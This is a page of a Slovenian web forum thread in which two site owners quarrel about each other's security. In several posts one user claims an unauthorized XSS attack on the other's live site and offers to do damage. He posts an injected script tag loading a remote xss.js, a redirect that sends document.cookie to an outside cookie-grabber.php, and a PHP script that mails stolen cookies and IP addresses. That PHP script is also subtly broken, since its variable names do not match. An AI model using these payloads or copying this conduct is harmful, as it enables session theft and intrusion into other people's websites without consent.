Najdizila.com [stran 14]

#131lahko pripomam en banaln primer iz Lila kr javno ?

#132Mactron, bom jaz prvi pokazal dobro voljo in te opozoril na napako na eni tvojih straneh. Sicer povsem banalna napaka, ne predstavlja nobenega security riska:

<a href="http://www.****.com/ target=_blank" target="_blank">***</a>

Z zvezdicami sem, da ne razkrivam tvojih zadev v javnosti, nadomestil dejanski URL in anchor text...

Ce pa ti mislis razkrivati kaksen security risk pri meni, bi te pa prosil, da tega ne pocenjas javno, vsaj dokler zadeve ne zakrpam. Ko zadeve uredim, se lahko po mili volji norcujes iz mene.

#133Vini tiste strani niti niso pol profisionalne in so bile narejene čez noč, za Slovenski trg. Ne morem biti na vseh koncih in ja priznam napako! Nikoli nisem rekel, da ne delam napak, napak je še lahko mnogo več. Sicer pa navadni user ne gleda sourc kode, heker pa ravno to ! Imam prav ?

Ampak ta napaka niti malo ni tako kritična kot, tvoja ko ti lahko s 5 vrsticami PHP kode ali jave ukradem cookie in si ga namestim.

Nikjer nisem zasledil, da so hekerji napadli preko a hrefa, sem pa že slišal, da so na srver namestili c99... tega je ko dreka!

Da potrdim svoje znanje ti laho naredim nekaj škode na strani ? Si za ?

#134No pa še kratek postopek.
<BODY ONLOAD="document.write('<script src=http://enurl.com/xss.js></script>')"> sem vpisal v tvoj url... enurl.com sem zamenaj potko, do hostinga, kjer je v xss.js nekaj vrstična koda za zajem coockia iz tvojega browserja.

Dela tudi tale koda:
location.href='http://enurl.com/cookie-grabber.php?cookie='+escape(document.cookie), kjer je vcookie-grabber.php naslednja koda:

<?
$kuks = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$sub = "cookie";
mail("bla@bla.com", $subject, $msg);
header ("location: http://mmmm.com/neki.jpg");
?>

P.S. Tok sem bil, do tebe dober, da sem skril javo in url in ta sranja.. Da ne boš čez kak dan down

#135Vem kaj si pocenjal, sem te spremljal v Apache logu, nobeden od zahtevkov, ki si jih naredil, ne naredi nic taksnega, kot opisujes.

Efekt za screenshot si pa najverjetneje dosegel tako, da si v URL polje vpisal naslednje:
javascript:alert ("This is remote text via xss.js located at ha.ckers.org " + document.cookie);

Na tak nacin mi bos zelo tezko naredil kakrsnokoli skodo. Slepo copy/pastanje iz XSS cheat sheeta ni znanje, ves?

#136ohjaa.. dobro!

#137BTW, na tvojo napako te nisem opozoril zlonamerno, ampak da pokazem svojo dobro voljo. Kot sem rekel, napaka ne predstavlja nikakrsnega security riska, je pa ta napaka vseeno dovolj resna, da uporabnik, pa ceprav ne gleda source kode, ob kliku na tisto povezavo, prileti na 404 :) In ne, ta napaka ni s tvojih sajtov, namenjenim slovenskemu trgu, ampak na tvojem sajtu, ki je se nedavno bil wordpress blog, sedaj si pa na njem uporabil tisto skripto, ki si mi jo nedavno posiljal. Verjetno ves, o katerem sajtu govorim, kajne?

#138

ohjaa.. dobro!

Tako se zmenimo. Mactron in Vini posredujta strani, ki jih je potrebno stestirati ... pa vama jaz report naredim ...

Seveda nepristranski.

Sta za?

#139Bakterija, se ti res opravicujem za tole off-topic debato. Testiranje, kar se mene tice, ni potrebno, ker ni to point pogovora. Bi pa res predlagal, da prenehamo smetiti tale thread in, ce je res potrebno, tole off-topic debato nadaljujemo v novem threadu, ali pa debato sploh pocasi prekinemo, ker ne vodi nikamor.

#140ha.ckers.org ? nevem točno kaj si hotel s tem povedati ? Kode nisem le preprisal le coockie grab je na njihovem srverju. Ja ne bom toliko neumen pa se igračkal preko svojega srverja ?

Sicer pa ni to samo ena napaka, sem jih našel precej, če želiš pa lahko še malo pokukam okoli Apacha in tega sranja ?!?
Sicer ti bo pa had pomagal pofixat, če se boš odločil, ko ima ravno tako znanje!

P.S. Ne podcenjuj XSS attacka, vrjemi mi se lahko naredi kar precejšna škoda z njem, čeprav boljše kak rfi, rfd, lfi!

Sicer pa kaj ti bi pametoval itq sem samo prepisal kodo...

-lp-